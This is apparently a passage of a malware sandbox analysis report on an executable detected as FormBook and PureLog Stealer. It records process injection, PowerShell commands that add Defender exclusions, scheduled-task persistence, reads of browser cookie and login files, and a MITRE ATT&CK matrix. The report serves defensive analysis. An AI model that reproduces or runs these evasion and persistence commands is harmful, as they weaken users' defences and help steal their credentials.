                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 4072
                    Queues an APC in another process (thread injection)
                    Source: C:\Windows\SysWOW64\systray.exeThread APC queued: target process: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CC6008Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: vWFGbvOdxI.exe, 00000010.00000000.2264345834.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4500042302.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499992590.00000000012E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\Documents.exeQueries volume information: C:\Users\user\Desktop\Documents.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeQueries volume information: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.Documents.exe.5bd0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Documents.exe.5bd0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.Documents.exe.5bd0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Documents.exe.5bd0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		612
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		221
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Abuse Elevation Control Mechanism                    		41
                    Virtualization/Sandbox Evasion                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		612
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Abuse Elevation Control Mechanism                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                    Obfuscated Files or Information                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
